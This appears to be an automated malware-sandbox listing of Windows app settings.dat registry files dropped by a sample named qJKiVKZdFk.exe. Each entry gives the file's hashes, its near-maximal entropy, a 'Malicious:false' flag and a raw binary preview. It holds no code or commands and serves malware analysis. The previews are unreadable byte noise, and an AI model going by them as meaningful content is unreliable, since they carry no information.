                                                                                                                                      Preview:regf../.>g..:..T..Yf6.l...9......._Ms..m.@....U.!_.[.{k..m...M.5oO.....E`..-b.y....>..{..Q....]_..@[g...(wD.*..K.. .../.`...V.4.....1...jy....._'_g.$..E......R.U.................M.&.<#.R._~4~S.?.=.bCS.P?.......u...T{s.D(o..)*5X!..$.k......Aaf...8.....3h.....l.P....NCc..O.Z..5...e.q.V..r4.sW.../..t.u.w..Iq9W:.4.O...y....z v.b.....ae.........u..p.^.....*\......70gzf/..[.>.w..@..l.BgK.|....l...G'.`...K..B.....O..Bn.&.K...b....4.X...9+M_.>~.8....4...y.q.EI...+..D..y.!w<....3L.,t~3o....s.)..n.......4.Pl......<_;Z9A"....)..o`6\J..X..s(.!..^..%.</\fC..xVT...J...).+....^.O.+.I.@...w.d,.....>K]..V....6...........z.......2S...........,..................-.v7f..N......I.......:..H*.]......A..&g.Dwe./&..!..P....C|..Z.wb=:.m.S...Q.w..BS..Aj...L=.....s..X.g......B$...X7.A+*........?.7A../. ..v....NT+[...{m.I....B.xm..f..r.j/}....A.....]..G....y..4.%...q.......0".....f.AUp?K..oe...'..i..o.B.v..@g:.f..S...DC.......j?...Im.R.T.......-.9y=..{*

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977832654969053
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:gY9/hwwnu7HLLW/desNG2E+6FE5F5vg+YDr1RMEtO2E:gY951kHLLWF42rTF5XChRMEE
                                                                                                                                      MD5:D936451B5827E84DE3B56C92FC828D48
                                                                                                                                      SHA1:82F0A70BFD7306964CB94FE67C53F00B71C8E072
                                                                                                                                      SHA-256:E7C403FC032B26E14088EBC8FA9947DC181746D1D12BF07D701553F700550E92
                                                                                                                                      SHA-512:FAFF04DDF1492F0F4C4E18C1FBC2DDF1C76B9FB3CFBC8782A0B5F7EFEF4935AC82346E2DCED1F1CC859412E3E85FF777D4A700091200580D83D41D724E86C19E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf......,.....B..O.L......B...>$.......r<..w.A.r.?..F.<..>..;..7].U1.0Wl$*......H.....WX..t$...:.........:.z...Y./y0Z.R.....1.V...`2.>........v...7.q...v=..V..r.....Y7^.%.....3&1bw...!H.f*...p.}....X24T.<y.?..*..s.u..mZP...l_...sn..&.@+.E4mJ..O.....N..j$.s.p....M-(.....!..oe....D..v..6...6N.....p..#.9!.00.1.....%R.\....^#....bQ{...a*o.p..0..9...;.Q..3r.dL..qtY).i.._\I......^..T....U.KQ.d.M...8.6.B.\.u...w..K.....*I..;..h).h9..wd..?66#.%....3.O.I.....j".W.._h.X7Lu....1s......'...M. .m.u..\......[dt.....!.T.r~F.UD./..G*;..c......g.`.....4...v8..J....1.....3....gQ.H4..q9.d......z..=.EH.<|{.......J^.......n]dXp..j.......W.9I5&...4..T.Q...6..`......X7..R.G. ...,...#...u...1..,..@V... C....".4..vb.N_O....pX...|...T05...../.S..Yn....k.x.B."9.g...A....G...e".......k.N.M....}.?...x.bU..S3..R.B:..H.....T#..../<.......]...^...L..X7I..)J...S.l..,.....B .i*:.4..-.a5^.n...NO..X=...2.#?..K3.Z....BL.A5...9lH.....u.S&..X.$...I......x...k.....R.O.....z..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979280231224567
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:2DTe3ClJ2OgZeb7Xdb/idztpQl9pnabiFAabMo:2DC3ClMJuLdQBpQl9pnabAmo
                                                                                                                                      MD5:279E39F974F405E76CB0EF84269C60F5
                                                                                                                                      SHA1:7E4D55C50B4C0D1EC136E0C65FC303FE9A7913D3
                                                                                                                                      SHA-256:4E53E657112874E13A4032D39EEBC6064B250E513767C2FE24BD051B18F2DF0A
                                                                                                                                      SHA-512:0916B2F487553440873A4C378FA22BD09DEFE5B97671B8EAA1446749CAD7B4F4005A5A1B0853ECA34DA63EBEFDA3F94C85A9B70DC427EF19E93432BD7CE10EB6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.N..".r.=J_...d..Jq.!S.f..B.....6.c..$....G*.XW.`c.;uQ..."!X...N.j]...;.f.u.fwqF"....t..W4"..X4.....~ZNt.G.MW./e.{.......e.F.J..T[;&.7tP....}.....m.......f...'.......#..B=.6.`...vq.C.;.....E....M..&.....V.N.OMU#I]./3.....*...)a.p8........!W;..A 1.....Z.%.,.>\....g.t9q!~..aU/... h.C..zO*.@gI..N.4.9.~.!.".Jg.r...7*..,W.H.......f,...{..A<.E...G.@..t]lM.?....R... .h...}G.G.I&...B..v.5...?.r.~)O.f..!...G.V..1{........Y.7...~....pvj...Lo.1./.3..a2.......]~.>?`.$_.#F...Kv8..Kv.F.I{1.K..I.E.$.....w.%\iU.Q...].....I....A.c.SpZ.;<......N&...O.Ik.A..3p.Z......2j...C];.Q@.......%.Yc....qKEQs...-.w.G.I...i....R..*...'..f}Px.....<.?Y@.9Y..(..@m$..B1Knd..:.m..a.......4...B.8.^..P^G....Z.)G....4..BX.....]..eF.q..u...D?.e<.W;..*y..A.....l.d..%.)Y3._...l...y.R.........!..;f.W...2j...0..*.... '....r...d..o......%^7..H..2...{we`.{.*.....~ it..0i.D7...*\...ST...Z.T|w..;.<'...R.yl.$.3.R..'am,.$<......D.....Y.|4/..K.8.o.UWM..3Zl......I..q.......*

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980462781581752
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:bSTuCaMwfFsbwNs5zbG2NGyGEcm26aTenNwPCIu:l7MwfFnNsZG9EcmpBnWP2
                                                                                                                                      MD5:6CDDF254F6B62D7F77D6063EAF199631
                                                                                                                                      SHA1:559FB0EB1DF6C140758BD482A466AEB2EBFF9A25
                                                                                                                                      SHA-256:8EDA7F876EC43CBAEDE78D545D864E07D3D4A677501FABEE1378C9DD9A7ED9E9
                                                                                                                                      SHA-512:0AD1D8E6A199166CE483426579E0C5BCD9D6F96514DF7BBB47331099CDF6EC5267E319C289BDAB6314F9EE0E0D7191E68414A617519508CCC1E24B392EFE1D72
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.t.O.K,....H6g..:_....".... .:..%...e..,....h.N..=...."....?.a+..[i.vM|J._..q.7.[................e.s..J...F{.W*..wo.l.>\...4G'D."....8RR.UT.....I.u.G.Md..3,._...t....X"..X.57.T..9...a..3..bh.i2E.9.@..X<..-.....r..>v.4."q.nt.y".?..y....Wk-...X........8..d$ff..........?..u}.7.....5........5h...NH4...f.....~h.L.<.4......U;..d3c.....K.......F0z.,..h..G.......ssm.w.l.d.`g.$F@{.4..y2....|-..y...P.K..=..&.d....nhn?.5..#......xx....1..D....C..X...9.0.X3..).:..G.!...j....?n?.0.5.m..j@|'..M(9.O....Jl..?JkG....SJ..N.E.MI..B..hm~b.P'.......T.&...a../....]..8r.t.Vt.i?.p.Xz.D..a.............&.....7.Hlf+s....A ..S._$...+.c..*.T.@p.c....^...q.....r...?.....$...........B:...aE.....a.j.DJ[V.z.h...@...n84.....*.K..=..XZX...5..VCF..f..!.}.y#.W....D....o......wK...8>..c.? ......hQ...N..ut.2.H.6....j..=.-[.........p.Ep3'.(.(..Y.(/...+...Gqo....^d.I,.;'z[qdq.._M.Y.~J.NP..b5.m5...Ur5i.Xj.Z...W..[{Z..{.%...E.5..1..SI.....uX.P.;_.k....pmr..`.!.....>..#.9...95!uy.E

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976461423171151
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:33llOQLthKHi4IaiFJWHrjSjyHAIul8/d1iFcxan3OUQeh/:pLthK9IxI9gpgdLxENQeh/
                                                                                                                                      MD5:B620DC43B49882D88F61ABA21075E198
                                                                                                                                      SHA1:5B30C285BBD7409FF9C2EE80491EC9C74DB64EEF
                                                                                                                                      SHA-256:9BE21E454E69C50C08D9D86CB75B805A081B4B515E9AC5A437D0AE3F16253144
                                                                                                                                      SHA-512:039653885C4F1D165911A560E0A1D85C28A44FC7022A0CB33A4B74B10F5DF03ADEA5C6EFF60EDF7E8229A21D4ED8E09DA25609DBEE4CD8F6CA257F0FCEA47590
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.CO.......9h..)..RM..T.z.yT.......6...\h7......t...y%.J..F=.~....;R.ZY..=.<,6N..ta.w.p.i.........e.N..~7.....f.c..."\s}.q=xep..k..#..(.......0.._.V4.S9.........Kv....A........4:..&}4............3..........u.+:z..i.1.B..H(.....1|...,-..6.r.+....^J*..\`..4B.....4..t.^\ho@....y..}..|*@.0.J..L.......e..5...>..Z.L.#p-+......k..j...p...b ......2.K[B....1).-j.#@.H.B..%;.C..}.^...m.u;]j.w...mbd...8...P.Mt..)[...T..,..;O.m..D\..o. q...o..%g&.J().!..3P..D...9t ..i..O...E.\..v....5.p.",...._..;.dq........fsj3..l".i.3.,..4..p0#..5.....5W.Q|.)4..{.....l..U...*...Q........J../...tF..9._..mh..a"..~a....$..%.lK.g>..B...5.K.0..@u.r.:..Pt.....h..~....`zj...t3..C/3j.>...iq/5D..'S..;u7.x.....WL.r.....J.(0)j.....l..).*0.2!.C.,.Z.....`...A.....ki.C.p...*..b....1,f....2.."0.C..Q.....D.u.z.N..-......[.u.....Z.,..oU:...s=;RH..tq...yY...i..nG...o....C..Aa.`.K<.......z......]........?z....O...j.x9.8%......Z.6.k(..w!...x....2Q..^../a..) ..`.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978586010931804
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:MAlOB2CnsMVsOmKhTwbJxGFiToUH4iEZ9fUmgchYsG:MAlOB2Cns/KqFxGlVfUmnyP
                                                                                                                                      MD5:7CC4A10A86FCBFA4C35A174B58F1BE52
                                                                                                                                      SHA1:5990371279530FB8823EB9AACDB027F42CABE3BF
                                                                                                                                      SHA-256:25F6E5A20C19BA118C433E1991410F5A81423BCC187AEF52816529AC07447E71
                                                                                                                                      SHA-512:441E84332EC3E33186723060AAC6D247FE45844ADFB896ECC05A5D5206C733D397F6FFF53B417F3FF2FCA96E35E437E854A70F99A0E16A3B29EED72D9D078CB2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.....=....BQ....6...%2G..~F...o=.e.^~Y"..yf.J...Rv............9......I...^.O.4n..h.8M....I...RR7..e#P...Bl.!..?.u.i..g.,S.AHGv."uo$...~....#N [..h..X.....w.|....e.w.g.?..M....vz.....=.....n.\..N...Z...6...D.."l-...P..N...F......s..p..eD.yS.$A..L....a...H^...<.....?o.../q.0.:5?..^DS.|......}3."..c...QG..e}..l...;).&.j..*w..!%O'>J...U/5=9P...HpU.D.....|.....5y:..9E`7XVQ.[.UV&\-,.. ...)...\....W..<..ME.....#R.W.%U...z...xw..7.I..7......_..).j..GF....h.lA..[..rh..C...7.f.h^..|.........R..._.....!.O.&;..qn..........x."..$..k.......\.2....)<...=.=..<.=*.,x`...?.........T.K.=..@L.9.......^.v.f.....U..M.*:..c."....t....bJ.....K.r.......E....y..:&...\.p..........^.....q..XI......0v..!.g...B...(.H..4v$.R.L..MP.J........1i.i.t4.9.&...A-..4..a..-...gC....1Cx.RD:>g...P.|.;r.P......0C....~{.....D?n.l...?Oz;...q0..%.Mxt..D.....W.GS*...f.}..P-U.,3.....-...4.`.:B3hLiUr....mM.........Z..]...B.W..e..}.)]|.i-r.yob8.8+..y..)....v.g.Y..).T..h..2..#T..h...{.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977765403151982
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:2aV3Jo1xlGQCHtT3QC0YR55I6ug7aYCAUmea:2aVMG3tTlVEg2C
                                                                                                                                      MD5:064A26C2D1DC3C29DADBB107DFBF2AAA
                                                                                                                                      SHA1:A3CE9AD9C28FF01E52B772E200B46E7F4028430D
                                                                                                                                      SHA-256:06F8940D51B3DC89911A2100AE2626EC87AB64DF78920BFF5CB2F96503647AB8
                                                                                                                                      SHA-512:9971BDF67368819097522AD1099DF68CC7C5ECC53541899A7304A3782F874748168763A886FC9DABF087ABA1093EDFD6A11F2E17CF5B2E5916D0867E39C2A7D4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.......A .!.c.+....{q8.....J.L.............!.u..ts.,.M.q..I.........q.}......l.vs....'..>.KX...j.R.=eNT\^.8..Q...el8mQ...L..:.TB..U..U..{+../._t.44...!..G..GS..8..?L..%..4p`.....m.H....2.......&~t.............=..O...3...x...K..{C.t...2.X..G....;:Y]k.B..k.Tl.v...).|......S..+..$..2..g.o..T...t.....OmH.n.J!/.....Sok.U..I.W.x..6.>0...fN..#Y...o...%.%...A@h./....0...e.{.{OQ.....W..a5&4#.....Np..@ Y....Up..l.x.....E..2...Pe.]...0.3\...j.&,.L.F.b.&3.-...l6.{..[.vq.i..&K.....4l..O)x.....x.....d.V.I.....5..._.*&.....|......%..:H..G..g..D.F`..w.jM.c...'.%w.m+..<].1L.-..[.....d...~~....w.....<.n....{|irk.@.F]..*.$e.9=.y...[..i.....v.%t....iF|3/.......D:..c.q\ z.......F.5......G.c"G...yB8....G..e.S..a.!.......+.?(..`.{..CU./.j......l.4-v.R%..u9....8=.".....i......,.......C.Q..Bv.Lv Fw..1.........nVaG.......X.^#g...1..%..V.fW..[%v].gR..WG.C7..C..v...]...@y...N....s.W%.0c.._s..C.)......`;.......[.[..S4...T..YdmVZ...[....".......Y...S....4.n

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976151594457017
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:3f+cCodS9ZxYomAtI200HGOVK8ZBtz18OAg53HHMDLEgI80:3WcCow37mQ0JOogzlVHHPgK
                                                                                                                                      MD5:555ABED84F96B3AAF64DE90A463CFE0B
                                                                                                                                      SHA1:7A44065BDB49F6B84D56CF86E830345EE42DFC35
                                                                                                                                      SHA-256:3C9ADC42392DAA53B9585D40667145FB6775BCFDF76DDA3244264F1E9E0F6CDF
                                                                                                                                      SHA-512:158F7A5EB551F153050227EE1BF4E96DF7B7D4EE143735DBA4B260EA9403F2E3084F74D6BC09310A90644BE50874B756087D403EB76D2B6C48227521817E37AA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....X..a.J.%|P...r{.Hw.i...7...U.^3.......M.b.\I:z..HI.C...o..Vs"#.o.i-..Y.*.^.e......^...A.|9..$........l.Bl.%..^.W...6q`...f8`>...E./..=..Y.....U}".B.&X.)BZ...1.....x..^T.P..p.Whpt.8..;a....*d.x4@V<.......Cs.P>,...)f....kt.B^.0`...._b....:...pj|.*.....>..5~.......vc..a-n..\.....'......'.-.>..,7...U..M..(...ov.....L>.......{.-q.'....W..Dm..jn..&..R@..q./F;....x...Y..........X8.......H]~..(..P..4s.>...g.T2...>7.......j......e..J.]~...V..S....q.].9.d..u4.<.Y..)hah.H..i...^//3+..8F....m.d..j@.a.....M..|..@.4}d....s9;..$G..(`.U..9KI.........X...>..l.,.h.J..!.....'C.T.&.u..F."n.<..XC....g.i.....:......z...J.F..p..jT..........s...t.x\.!..y...=.d..*PD.....}.$<n.W..m.D...{E..J...s...XV....NN.k.EL.H..06..v......_.r<.mA.V.2D]................K.D{./j...'KLG(J...cj.g.+..x.:hU#.1{.9.CN..F.D;2k0Z.+l45p.h...Y..!....,|...M!.pqx#.[0J...W....9.. \.!.......m.{.....X.;X.3m ..r...B!.s....1..|12<.+!..kR....;../...0.\..~..@DmhbVYH..X...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979361955937029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RsLNwgAzpfFFEixJDL8V6hiP8IkpjM+hKVjLLt+TyH6ym/CbA:RsJwgANnEi1hi03KxLMOH6h68
                                                                                                                                      MD5:D564E6931D6C59487E56DBE1AF5699A9
                                                                                                                                      SHA1:6EC6DEB05547251845FE142955959E29B8CAC76B
                                                                                                                                      SHA-256:EDFD37F4CC054D49BCC4C2149B3F10E6E1CB283C68E9F300B64F839A55D64116
                                                                                                                                      SHA-512:6A72821F5EBA9774456DFE82D931F3BB9E3E1D277BF9F3B3577AC59B5EBE4725CA6436EB7CEA83A14A85D6A10B529A18E0A2DE21BFD4AE4A2A3B38BD58B8EEE6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..........B.8..6K...n.........9.'.+^.;/:...xE.Z|.LF..8.f.....v.()...2..:.o...dgew...[.X..jY."5.3....r.xm .h.|pU....W.......`9..r...7......sQ...>...m2u..zL.....w..RR.@.`..!....vC.'LI..q..6'6.f.I.......S..K......m7vE|T:T..T=,Fvl~..{..(.*......~.A..$.h.SR.......J2:..'.v.DCP...p.)RZ...;....`...L..<{$=?0.j*...7.b.J.~....J1..x.N.F..V..~...l&Gx.YL.wM.....7..o...x....q..gj1 ..|.....F.......3@7...}..v ,.....R....._(.......m8.i..9..._....I...in......u|...g......G.l..|..9....Lm...S..5....j.O...0?8..9n....f.".zqH.@............4_#{./.........%&..wi.k.}.;..t.I.w3.X.T.X).6..&.SI=7...[S...0..Q.P...g(`...&.8q).8.$..g..R.7.\...q.....|.6ve..O...g7'.}.5..X.L.fj.j..@pci...h......W...^.T.y.O..t.d.8.......OOC.....R...0.g9..2...>....4.mN.fAb..lf..m..(...W..R|....x.,R:5h.7+}........x..}.p....x.[f.c.."Y.A..7...z.1..j......N..j.... f9C..f.4G...-.9Os.\.n..7...y.D^.t..lKP".8.|.....I.V.G...{....B../.t=.}...$w.F#\..7.D.q..........8}.XIo.U..,..WE...%xC........%.$..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974838963365924
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9xfVpgQql0qw5JkyyKdUJ8hkHirTfQwSDB6U9NSUO7IdfEZCRUJP:jfVpFq7w5Jkyy60mlSDBzwR7sfEQM
                                                                                                                                      MD5:5629A208D82D0618ECAC383FC93D242D
                                                                                                                                      SHA1:AEC0CF2F67A204F6705FC079C5BD586D3CB2781A
                                                                                                                                      SHA-256:EF6FB1B02F96ABA8A32DB41C803BEAB7F59CD71C0933DE95C8B55D6A04324BB4
                                                                                                                                      SHA-512:0A9919A621DB12354820820B31D3BCC3AF61E417ACF830C5C69F00EEC74AC27B783E3A82EC058024ADE6344898D09A0D4CDEB597E2737A509721642A4419AE5D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...c...8"..b<.E3?.........)lKY.=..z.k...0..U.s...*....N...y..R..A.f...~..H...m........0r..T7.....jr.N..=.......:..4w.(.M.DN..M.."JU|?.QJ.F....l.....J..y....2@W.".W..?d.3.7#.Rsz...C7R.....f..7.0.....9...kU..%n..?.. .. ...U.G...d.B...~...^D...`.V.....E.N.S..y.Ik4..;h<=.....^V...P.$[85. L)[n.<.U..:.g0'.L..?..:..8;..08....*..;..G..'H....j^{v..a.{3~N.O.'J2.j...!uF;,.rK.).)....t........"3.i..J...9.(.H.U..'.V[.oR...F..a.T.+..mW..g9z_."....s.....4......MQ..m.+.A..-..(....'..E.{....q..{.I..~.k.d|.......<....$..>.....b.1;.....Gl.......we.ll......B.).?7^t...z..._.vh........i...H.2/O.}...)..P..LZ.Q.......!.....)....T..!.d\...o....bA-..N0......W.-....M..[.........N.m./..4...H['..,.x|....l..\f.S..R....... ..{.!)e.@:.i..]...W.....leD.v....*..N...P6..B...w.0.&X.X.}.....lg3....x:.[&....c..V.y.....D]X.j.# ..U.s.5\.[k.k|)..b#Ur...j..3.k..R.|.O.......t.<b,... g._..7.........r.Y..>.aX&[.>.e`.R...C.y3r.K.-*'.......G.Q. .O...x...b$.D.%.........Z..C..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978968441836402
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Dsuz0kSqOp5DMwQ6x/fkSDV16DpoGUX2AS9Ca9CcVRDZZS:guz0TV/NQ6NfkUV1kUXFS4a9Co9C
                                                                                                                                      MD5:95F2E898B35929EFC6307B63502B9F75
                                                                                                                                      SHA1:74BC2100B8DF7C06F561B570C9F5CBE7D163F3EE
                                                                                                                                      SHA-256:1DEE950DF71D9C421946799AB2FDFE89626B20CD661FC46BBE2750B01E0C711A
                                                                                                                                      SHA-512:8833D9EE2A2C2C913FE35CF0EEBC641A5AF82D1CF02CB8A31F82438EDB28D28B81F4F30936C2D9652925D07057A29721B3097D0A2954E9A9399B01AE4AE87D74
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.u\..S........V..`).w.t./c}i.gH...pe..d...ez..R.[)PK$.}....a.?..B...>......t.*...^gf.I7...IIpD........7.''fA....c.g..7.....n....I=......&.6..G.-[..R?......<-.lTk>....q...;.....`......k.L......c...".9..".l....l....H+l1....i.4.....^5.....0..s..s...t..J.a.<..Z..sC..R..........O.....CJ...0j.....m.#.Y.B...@R...)(tp..0..Na.y}...N.&.......bP..i......W..M.l*...Y<It7p..R...B.*q.K.....V$..c..q.[v.....K<...$.O......).&.\.RAB(!&$..1...,..X:.c...!..<b.=!h.......|.Y.....l.D..Gm.<...:...V..{..c.ux....G..._Zl...f...b......\L..6..../S...&......\.'....w...rI".$e..L<..h=Ha..6T..,g7....&....KBr[DM@...@.=........Gx..>j<a.....].JG.....Q!....V.F...jS.X.....n..BY..C...$..[.;2...xn.R...x~..G,....-.7.y8.....=U.2.......[.H...j.K..y.Q.].`...b....4..}..4.....N?......u_M...3....z1.fn>..An../W.4|.D>....a...Q=.>b4..y....[.l..........'_.:.. .V...[0.F8...o.QB#I.d.T....p/$......B.t............aW........0.#bd.>..*.V..,.,.....&..}p`y.x/c.2B..8.3v+.Z.L..1..B. '..\..^m{A7...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979863605845537
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:GfNW9nZaitCtRDYSBBToKbWORRR08IBARrLW2:GfA9nZ1CtGgo+FRy8ImXh
                                                                                                                                      MD5:622EA078BBB62ED3851EB05388C62306
                                                                                                                                      SHA1:9B24F5B1132F3705FE21D728EDFA7B136E49675B
                                                                                                                                      SHA-256:0CC036B2BB5AB0897D4A769A3614E9F2DDC393EF6EE29C8F0FC57E3A80F801F9
                                                                                                                                      SHA-512:C7B674EFF6365E1BD241B4B6297B6033AE46FF113F3CCFD3B4AEC2F312C23E55B6F0C52CA0C3EACDDCD36A02AE52A92BD4A574DBACEFC77E2655F878A53602F6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.39.....3......A...h..e.i..h.d.f...I..O....7..2...*'8un.b.m!EI+.CK..sOD6...7....m.z$..g....\....b..0.....-.......n....?.(M........XM....i.p..u-.8..D.=..}...........s..W...!.,Y..om..B..93}..>..YD.."O.RQ..YM.[q.@...Dh...Y..&............%2....\.......8...!,...s.#o.uWS.....Q._...(..a[..'...........u...%d"M..........!...y.D.....0....d.&....*.H.#.li..'.#.&...`..n....)64.@....2.w.i.li'k6..o.2$m..;!......[?V..r...z.7.r.....1..}i...}]T[..@...B..k..y2y..T..k...3?.J..!J...7....%..Ka...w..oA...w..*<E9....<....4..>....~.G<...UK.m.?...r.6.eJI...r.n.D..p.......Q!..u1.O..o[.......%.?vv.(--....0=...e...;...fX....{..L...3.m..z....c..6M...]..c..........<^......{.>.3.Dc2.7..).....JH...a.6.F.....r.=.u..I&..l.%x...,..|...#)3......[.......D#.6.!..beG..:\x.o.n.'..)=.YOd.5....4l..uj....M&.....b.6j.".......q<{.R<.x..:....?Q.........c.."&vn.)..Oc..A......Ch..G*.I....]4.S\Ud...j.X{lTL.....G.!..b......`.^u.yg..l>j..3...V..z(...+...Zr...z.d.(hd....R

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9777675169832465
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1XdIbnhr8TRD3r61lLWdaRo2gpx+IBTHE2FFqRKAn0y+fn:KeTRD2f8aRo2MbhFFqRvnI
                                                                                                                                      MD5:5D02A45E2FF09B71F16EBFB7077C34E1
                                                                                                                                      SHA1:E8CA24BE65889A90A4F7B689C5E6515CD6D71414
                                                                                                                                      SHA-256:3B8FBC7DC34B11CA8DB02E2107A0CF75606A2C6A047810357E2DBC1B047CE8CF
                                                                                                                                      SHA-512:00B8CFD8151FB25AB1BABB340583A6B0D1CC341EC0948C91B135FF5B2D28A879B064E74583715D33C5A0904626123D2F5F6F646EA0F68A2F9051EC5623BAE16E
                                                                                                                                      Malicious:false
